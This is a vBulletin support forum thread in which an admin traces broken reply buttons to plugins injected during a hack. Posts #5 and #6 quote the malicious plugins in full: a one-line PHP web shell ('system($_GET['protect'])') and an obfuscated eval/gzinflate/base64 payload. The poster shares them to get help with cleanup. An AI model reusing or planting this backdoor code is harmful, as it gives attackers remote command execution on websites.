Announcement

Collapse
No announcement yet.

Reply to Thread, and reply with quote problems

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Reply to Thread, and reply with quote problems

    I am having a problem where both the Reply to Thread, and reply with quote buttons are not working. When you click on either you simply get a never ending spinning loading symbol.

    The only way for me to get either to work is too disable the plugin/hook system.

    I updated from 4.2.0 PL3 to 4.2.1 and it still won't work.

    Here is the kicker, I have just finished removing every single plugin installed and still with the plugin/hook system enabled neither button will work.

    Any help is very much appreciated.

  • #2
    Does the button work if you disable the plugin system?
    MARK.B | vBULLETIN SUPPORT

    TalkNewsUK - My vBulletin 5.5.4 Demo
    AdminAmmo - My Cloud Demo

    Comment


    • #3
      Yes, the button worked after disabling the plugin system, I later found that I had to disable the "vbProtect ajax_start" under the plugin manager and then everything worked fine again.

      Comment


      • #4
        Did you just remove all your products (Manage Products page) or did you also make sure to remove all your plugins also (Plugin Manager page). Those are two separate pages and you can install plugins that are not part of a product, so it is important to look at both pages.

        Whoops, just realized you fixed it, but I will leave the above advice.

        Please don't PM or VM me for support - I only help out in the threads.
        vBulletin Manual & vBulletin 4.0 Code Documentation (API)
        Want help modifying your vbulletin forum? Head on over to vbulletin.org
        If I post CSS and you don't know where it goes, throw it into the additional.css template.

        W3Schools <- awesome site for html/css help

        Comment


        • #5
          As it turns out this is likely due to the Federal hack that was going around, as we were hit as well. So after disabling that plugin everything worked again, then again this morning a new plugin was created and both button stopped working. The contents of the plugin is as follows:

          Product: Vbulletin
          Hook Location: Ajax Start
          plugin php code: system($_GET['protect']);

          Now with this enabled neither of the reply to thread or reply with quote buttons work, any further help would be greatly appreciated.

          And I have already deleted the install folder.

          Comment


          • #6
            May have this figured out as well, there was another plugin called:

            VSa - Advanced
            Hook Location: Ajax Complete
            plugin php code:

            eval(gzinflate(base64_decode("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")));

            Comment

            widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
            Working...
            X